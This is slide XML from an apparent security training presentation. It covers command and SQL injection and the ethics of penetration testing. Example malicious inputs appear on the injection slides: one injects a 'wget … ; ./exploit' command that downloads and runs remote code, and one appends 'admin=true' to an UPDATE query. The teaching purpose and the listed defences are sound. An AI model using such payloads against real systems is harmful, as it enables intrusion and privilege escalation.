            <a:ext cx="828675" cy="71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7719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A606D0-E1D2-A560-F1C0-C98D0909AC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F93F8-D756-E0D8-0551-89C2E14DE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flaw #3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injections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649CD7-4A6B-A8FB-1FA4-14B6338F2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987574"/>
            <a:ext cx="8744843" cy="379842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Command injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="-209550">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2624138" algn="l"/>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>server-side command: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E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            $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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserInput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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              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E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="-209550">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2624138" algn="l"/>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malicious input:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://…/exploit ; ./exploit #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="-209550">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2624138" algn="l"/>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executed command:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://…/exploit ; ./exploit #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E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="2624138" algn="l"/>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://…/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># &gt; log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="E1E6EF"/>
              </a:highlight>
              <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="-209550">
              <a:tabLst>
                <a:tab pos="2624138" algn="l"/>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="E1E6EF"/>
              </a:highlight>
              <a:latin typeface="Andale Mono" panose="020B0509000000000004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D7B4C0-CF0C-B8CE-5D0E-8DB0492FF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4C4A1A-7CAD-9AE3-696A-A285D194F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330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06EDEF-5279-2ACC-9025-ADFA3314F2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284B1-2FD8-33D4-A6CE-1C2997C5F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flaw #3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injections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B44FE-843D-7B73-CEAB-A94A984EA5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987574"/>
            <a:ext cx="8744843" cy="379842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SQL injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="-209550">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2227263" algn="l"/>
                <a:tab pos="2624138" algn="l"/>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>server-side query: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E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UPDATE user SET age=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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  $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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserInput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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WHERE id=…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highlight>
                <a:srgbClr val="89AAD3"/>
              </a:highlight>
              <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="-209550">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2227263" algn="l"/>
                <a:tab pos="2624138" algn="l"/>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malicious input:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                   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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>25, admin=true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="-209550">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2227263" algn="l"/>
                <a:tab pos="2624138" algn="l"/>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executed query: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E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UPDATE user SET age=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89AAD3"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>25, admin=true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E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WHERE id=…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="2227263" algn="l"/>
                <a:tab pos="2624138" algn="l"/>
                <a:tab pos="3308350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UPDATE user SET age=25, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>admin=true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E1E6EF"/>
                </a:highlight>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WHERE id=…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6B6B13-659A-0EF3-AA15-9E18D735F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389EE5-8C09-F231-E6AB-F6FF31D83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4244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5379D-66AB-40E8-8B6E-8E5476C7E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flaw #3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injections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ED9FDF-22D9-CAB0-D8C5-29CEBD3F43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</a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: user input is used in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(concatenated with) server-side commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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</a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: malicious user input </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>becomes part of the server-side command</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and changes its logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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</a:rPr>
              <a:t>Solutions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="-209550"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(filter, check if valid)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="-209550"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitize user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(quote/escape special characters)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="-209550"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securely pass user input to backend systems</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(parametrized SQL queries, safe command-line calls etc.)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B5FCA3-9439-143E-FF30-FD2887592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3DFDA4-045D-54E8-317B-DCFEE5F03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22</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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F05357A7-FFED-6B85-D600-A12507BE4D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8734323"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5940152" y="1060028"/>
          <a:ext cx="3119596" cy="30238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31E1B2E-1FBC-E6D3-7C17-7451B8FF6D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6040517" y="1810826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validate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32AADF-F77A-C913-8515-403C216F8B97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084168" y="2947372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sanitize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22B9A3-137A-5F89-7A03-AB7AC4E84D05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7452320" y="2947372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pass securely</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4063578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9" grpId="0"/>
      <p:bldP spid="10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A5061D-ACD0-CD8F-1422-06184D07CF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E643A-5E55-7B6D-823A-A8BD1C9F1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99" cy="51435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F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security penetration testing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5FB9E5-A500-275B-5A92-88E4B30A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86723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8F520-46B2-E728-07E2-4A046D3A1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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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B29E8C-019A-FDAC-450A-3C205A22B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94AD84-4C13-7CD6-D386-75FD2F248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24</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="pentesting" descr="pentesting">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACF5E7CA-1E21-0A30-895F-E2C636E305E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 bwMode="auto">
          <a:xfrm>
            <a:off x="3419872" y="-1255846"/>
            <a:ext cx="3600400" cy="6399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1840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7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B096B8-FE5D-D99B-4823-0329442123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E006-2936-FCA6-D1A4-11A64E551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penetration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DE670-07D5-EDD7-DF2F-5597E5598F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Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>finding security vulnerabilities, misconfigurations, exposures etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… in external software or systems (open source, closed source)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… in in-house developed software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same tools and techniques (mostly...) as black-hat hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, done </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ethically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>following the rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>be open and transparent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>always get a permission from the owner of the system beforehand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>be careful, do not affect the tested systems or data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>don’t abuse any vulnerabilities that you have found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>report your findings back to the system owner, don’t share them with third parties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ACD558-6B4C-BB94-D7AF-F2E526613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F5EBB8-0C3A-B96C-43D2-DB71EDBDD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25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7708A4-BBCE-449E-AEF3-83F1129A44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2360" y="3122905"/>
            <a:ext cx="884132" cy="9610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893D3D-A77D-A23C-448C-50CD5F7E20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0800" y="1923678"/>
            <a:ext cx="807251" cy="893742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Down Arrow 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{384E387D-F831-1487-0C2E-04E102D1838B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8175411" y="2819778"/>
            <a:ext cx="158027" cy="319035"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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04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CE73B-900C-3336-0A75-E12B63019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9E87C9-2DD3-FA4D-9397-682A3F9459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1A7CFD-BB8A-F2E9-2EBA-AA59E87AD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6620F5-2B13-1F90-85E7-B1983B56C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26</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Presentations\materials\szlaban.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{326F61C4-112E-6AB9-BC76-EFB0D092D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2" y="0"/>
            <a:ext cx="6912319" cy="5183444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/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2DD58DC-E6E0-EDD1-CB90-4BCB7D3EA5BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="1779662"/>
            <a:ext cx="3016696" cy="208789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n-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Looking for…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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Missing or partial security measures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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ways to bypass existing measures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3272898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174E3-A8D0-9A46-8079-9014C9A17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Blackbox vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whitebox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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43CFD-CA7B-7B58-0BD5-8D29DBEAFB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Are internals of the system known to the tester?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dirty="0"/>
              <a:t>architecture, source code, database structure, configuration ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            testing as a user                                      testing as a developer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FC6028-072F-F871-F7F7-C5D3ACB0D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F4C859-8DC9-E177-94D7-C32204855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27</a:t>
            </a:fld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AD2F8E-2497-DAE3-0CAB-0DF629AEBCFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="2021235"/>
            <a:ext cx="3456384" cy="184665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dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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79A482B-1FBE-1121-F1B5-2F9DD3627B18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4788024" y="2021235"/>
            <a:ext cx="3456384" cy="1846659"/>
            <a:chOff x="4860032" y="2590453"/>
            <a:chExt cx="3456384" cy="184665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6993B1A-9C80-4C8C-163F-FF2CA6EE9C3A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4860032" y="2590453"/>
              <a:ext cx="3456384" cy="184665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2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="6600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
            </a:p>
            <a:p>
